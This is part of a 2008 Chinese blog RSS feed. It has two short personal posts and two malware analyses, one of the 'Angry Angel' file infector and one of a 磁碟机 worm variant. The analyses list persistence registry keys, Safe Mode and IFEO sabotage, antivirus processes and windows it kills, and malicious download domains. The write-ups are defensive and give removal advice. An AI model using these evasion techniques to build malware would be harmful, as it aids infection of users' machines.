<p><font size="3">60.貌似主角都是独生子…………</font></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%D7%AA%CC%F9%2D%28%C0%B4%D6%C1%CD%F8%C9%CF%29">转贴-(来至网上)</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/36e3a3b19f99f650092302af.html#comment">查看评论</a>]]></description>
        <pubDate>2008-03-11  16:34</pubDate>
        <category><![CDATA[转贴-(来至网上)]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/36e3a3b19f99f650092302af.html</guid>
</item>

<item>
        <title><![CDATA[（愤怒天使）Serverx.exe简单分析]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/79e387ec6afddd2363d09f54.html]]></link>
        <description><![CDATA[
		
		<p><strong>文件名称：</strong>Serverx.exe</p>
<p><strong>中文别名：</strong>愤怒天使</p>
<p><strong>文件大小：</strong>9418 bytes</p>
<p><strong>AV命名：</strong>Virus.Win32.Small.l（Kaspersky）  Win32/Small.S（AVG）</p>
<p><strong>加壳方式：</strong>未知压缩壳</p>
<p><strong>编写语言：</strong>VC</p>
<p><strong>文件MD5：</strong>d84227ad798e709697aabb287c36b556</p>
<p><strong><font color="#0000ff">行为：</font></strong></p>
<p><strong>0、查找互斥体&ldquo;VLPTj&rdquo;，有则退出进程。</strong></p>
<p><strong>1、释放文件：</strong></p>
<p>C:\WINDOWS\system32\Serverx.exe  9418 字节</p>
<p><strong>2、添加启动：</strong></p>
<p>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</p>
<p>(注册表值) Serverx = &quot;C:\windows\system32\Serverx.exe</p>
<p><strong>3、禁止Admin$共享：</strong></p>
<p>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters<br>
<br>
AutoShareServer = 0</p>
<p><strong>4、监控&ldquo;SOFTWARE\Microsoft\Windows\CurrentVersion\Run&rdquo;整个项</strong></p>
<p>如果有变动，则执行第二点，添加注册表。</p>
<p><strong>5、下载其他木马：</strong><a href="http://vguarder.91i.net/SETUPX.EXE" target="_blank"><strong>http://vguarder.91i.net/SETUPX.EXE</strong></a></p>
<p>测试时未实现。</p>
<p><strong>6、感染后缀名为exe和scr的文件，感染标记应该是&ldquo;Angry Angel v3.0&rdquo;。</strong></p>
<p>感染时会跳过&ldquo;wind&rdquo;&ldquo;winn&rdquo;开头的文件夹。</p>
<p>感染方式没看～～</p>
<p><strong>7、可能会查找局域网内可连接的主机传播该病毒。</strong></p>
<p><font color="#ff0000">解决方法是升级杀毒软件，修复被感染的文件。</font></p>
<p><font color="#ff0000">然后删除其启动项。</font></p>
<p><img src="http://www.dehuaca.com/UPLOADFILE/2008-3/200831111185366246.jpg"></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%D4%AD%B4%B4%28%B2%A1%B6%BE%B7%D6%CE%F6%29%60%60%60">原创(病毒分析)```</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/79e387ec6afddd2363d09f54.html#comment">查看评论</a>]]></description>
        <pubDate>2008-03-11  11:25</pubDate>
        <category><![CDATA[原创(病毒分析)```]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/79e387ec6afddd2363d09f54.html</guid>
</item>

<item>
        <title><![CDATA[脚崴了,郁闷]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/ce2286d39129fa30970a1613.html]]></link>
        <description><![CDATA[
		
		<p>RT，疼死了..55555~</p>
<p>Y_Y</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/ce2286d39129fa30970a1613.html#comment">查看评论</a>]]></description>
        <pubDate>2008-03-09  15:19</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/ce2286d39129fa30970a1613.html</guid>
</item>

<item>
        <title><![CDATA[磁碟机变种简单分析（lsass.exe、smss.exe、dnsq.dll、NetApi000.sys）]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/4eab77ee3c3ef2ffb2fb95f0.html]]></link>
        <description><![CDATA[
		
		<p>这东西接近无敌了：</p>
<p><font color="#ff0000">绕主防/Hips、Byshell技术、监控文件、破组策略/IFEO、U盘感染</font></p>
<p><font color="#ff0000">进程守护、关杀软、屏蔽安全工具、感染文件（带加密）、破坏安全模式等等</font></p>
<p>哈哈。</p>
<p>测试为反汇编和一些实机运行跟踪。</p>
<p>因为壳的原因，可能分析的不准确。 :)</p>
<p><strong>1、检查互斥体&quot;xcgucvnzn&quot;，判断病毒是否已加载在内存中。</strong></p>
<p>如存在，则退出，防止多个病毒体被执行。</p>
<p><strong>2、创建文件：</strong></p>
<p>C:\037589.log 93696 字节<br>
C:\lsass.exe.1771547.exe 93696 字节</p>
<p>C:\WINDOWS\system32\Com\lsass.exe 93696 字节<br>
C:\WINDOWS\system32\Com\smss.exe 40960 字节<br>
C:\WINDOWS\system32\Com\netcfg.000 16384 字节<br>
C:\WINDOWS\system32\Com\netcfg.dll 16384 字节</p>
<p>C:\WINDOWS\system32\1878253.log 93696 字节（随机）<br>
C:\WINDOWS\system32\dnsq.dll 32256 字节</p>
<p><strong>3、删除组策略限制的注册表项：</strong></p>
<p>HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer</p>
<p><strong>4、删除：</strong></p>
<p>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</p>
<p>HLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\</p>
<p>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\</p>
<p><strong>5、破坏安全模式，删除：</strong></p>
<p>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}<br>
SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}<br>
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}<br>
SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}</p>
<p><strong>6、防止病毒体被重定向，删除：</strong></p>
<p>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options</p>
<p>（禁止写入）</p>
<p><strong>7、释放驱动C:\NetApi000.sys（\Device\NetApi000）恢复SSDT Hook。</strong></p>
<p>最后删除自身。导致HIps和主动防御失效。</p>
<p><strong>8、修改注册表，开启自动播放：</strong></p>
<p>NoDriveTypeAutoRun DWORD: 145</p>
<p><strong>9、删除服务项（如果有）：</strong></p>
<p>SYSTEM\CurrentControlSet\Services\KSysCall<br>
SYSTEM\CurrentControlSet\Services\EQService<br>
SYSTEM\CurrentControlSet\Services\HookSys<br>
SYSTEM\CurrentControlSet\Services\McShield<br>
SYSTEM\CurrentControlSet\Services\tmmbd<br>
SYSTEM\CurrentControlSet\Services\PAVSRV<br>
SYSTEM\CurrentControlSet\Services\SymEvent<br>
SYSTEM\CurrentControlSet\Services\ekrn<br>
SYSTEM\CurrentControlSet\Services\KAVBase<br>
SYSTEM\CurrentControlSet\Services\klif<br>
SYSTEM\CurrentControlSet\Services\AntiVirService<br>
SYSTEM\CurrentControlSet\Services\MPSVCService</p>
<p><strong>10、调用cacls.exe，设置\system32\com 和病毒文件的权限为Everyone:F。</strong></p>
<p><strong>11、\system32\com下启动smss.exe和lsass.exe，使用进程守护。</strong></p>
<p>当一方被结束时，另一个则将其重新启动。</p>
<p><strong>12、C:\windows\system32\dnsq.dll安装全局钩子，注入所有运行中的进程。</strong></p>
<p><strong>13、发送垃圾消息到如下窗口，导致程序无法正常响应，处于假死状态：</strong></p>
<p>avast<br>
mcagent<br>
escan<br>
firewall<br>
AfxControlBar42s<br>
tapplication<br>
antivir<br>
ThunderRT6Timer<br>
thunderrt6formdc<br>
SREng <br>
thunderrt6main<br>
eset<br>
mcafee<br>
afx:<br>
360anti<br>
360safe<br>
avg <br>
facelesswndproc<br>
bitdefender<br>
ewido<br>
#32770<br>
monitor<br>
dr.web</p>
<p>诊<br>
具<br>
SREng 介绍<br>
升级<br>
微点<br>
防<br>
云<br>
墙<br>
kv<br>
木<br>
狙剑<br>
金山<br>
瑞星</p>
<p>..........</p>
<p><strong>14、尝试关闭包含kissvc、guard、watch、scan、twister字符串的进程。</strong></p>
<p><strong>15、独占方式访问：boot.ini和hosts。防止dos级删除病毒和用hosts屏蔽恶意网站。</strong></p>
<p><strong>16、查找网页格式文件，加入一段框架：</strong></p>
<p><a target="_blank" href="htxp://js.k0102.com/01.asp">http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70</a></p>
<p>解密得：<a target="_blank" href="hxxp://js.k0102.com/01.asp">http://js.k0102.com/01.asp</a></p>
<p>该地址会检测referer，返回的来源地址如果有效，则执行：hxxp://js.k0102.com/a11.htm</p>
<p>感谢刺猬大大的指点。</p>
<p><strong>17、ping.exe -f -n 1 </strong><a href="http://www.baidu.com/"><strong>www.baidu.com</strong></a><strong>。如果网路通畅，调用IE访问：</strong></p>
<p>hxxp://jj.gxgxy.net/html/dg2.html<br>
hxxp://jj.gxgxy.net/html/qb2.html</p>
<p>每隔一段时间执行一次。垃圾广告啊。</p>
<p><strong>18、在可用磁盘生成：pagefile.exe和Autorun.inf，并每隔几秒检测一次。</strong></p>
<p><strong>19、修改注册表：</strong></p>
<p>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden</p>
<p>把REG_SZ, &quot;checkbox&quot;值填充垃圾数据，破坏&ldquo;显示系统文件&rdquo;功能。</p>
<p><strong>20、每隔一段时间会检测自己破坏过的显示文件、安全模式、Ifeo、病毒文件等项。</strong></p>
<p>如被修改则重新破坏。</p>
<p><strong>21、忽略系统盘感染可执行文件，还加密..感染过的程序图标变16位的（模糊）。</strong></p>
<p>支持Rar压缩包内可执行程序的感染 - -!</p>
<p><strong>22、&ldquo;高科技&rdquo;：</strong></p>
<p>使用了byshell的技术，当系统关机时调用SeShutdownPrivilege函数时</p>
<p>这时候dnsq.dll会将C盘下的某某.log拷贝到：</p>
<p>C:\Documents and Settings\All Users\「开始」菜单\程序\启动\</p>
<p>名字格式差不多是：~.exe.某某.exe</p>
<p>最后计算机重启后，等病毒完全释放，立刻就删除这个：~.exe.某某.exe</p>
<p>哈哈，真是天衣无缝啊。</p>
<p>其实这种垃圾技术，只要冷启动就可以对付了。</p>
<p><strong>23、尝试删除dnsq.dll的时候，它会立刻重启计算机。由第22点，关机前写入病毒。</strong></p>
<p>造成一个死循环。</p>
<p><strong>24、监控lsass.exe、smss.exe、dnsq.dll文件，假设不存在，由dnsq.dll重新拷贝回去。</strong></p>
<p>因为dnsq.dll安装的是全局钩子（在所有进程中），所以非常麻烦。理论上不可能删除成功</p>
<p><strong>25、当拷贝失败后，病毒会调用rd /s /q命令删除原来的文件，再重新写入。</strong></p>
<p>那么所谓的免疫文件夹就失效了，其中包括歧义文件夹。</p>
<p><strong>26、连接</strong><a href="http://**.k0***.com/go.asp"><strong>http://**.k0***.com/go.asp</strong></a><strong>计算感染人数并跳转</strong><a href="http://**.k0***.com/goto.htm"><strong>http://**.k0***.com/goto.htm</strong></a><strong>下载木马</strong>。</p>
<p>过几天无聊了再去测试.. - -</p>
<p> </p>
<p><strong><font color="#0000ff" size="4">另外附上安铁偌的磁碟机专杀：</font></strong></p>
<p><a target="_blank" href="http://www.kingzoo.com/tools/孤独更可靠/Auk_diskGenKiller.exe">www.kingzoo.com/tools/孤独更可靠/Auk_diskGenKiller.exe</a></p>
<p><strong><font color="#ff0000" size="4">个人防护建议：</font></strong></p>
<p><strong>1、打齐系统补丁。</strong></p>
<p><strong>2、安装杀毒软件和防火墙，并开启自动升级。</strong></p>
<p><strong>3、不浏览yellow网站，下载软件时尽量到大网站或官方。</strong></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%D4%AD%B4%B4%28%B2%A1%B6%BE%B7%D6%CE%F6%29%60%60%60">原创(病毒分析)```</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/4eab77ee3c3ef2ffb2fb95f0.html#comment">查看评论</a>]]></description>
        <pubDate>2008-02-29  21:36</pubDate>
        <category><![CDATA[原创(病毒分析)```]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/4eab77ee3c3ef2ffb2fb95f0.html</guid>
</item>


</channel>
</rss>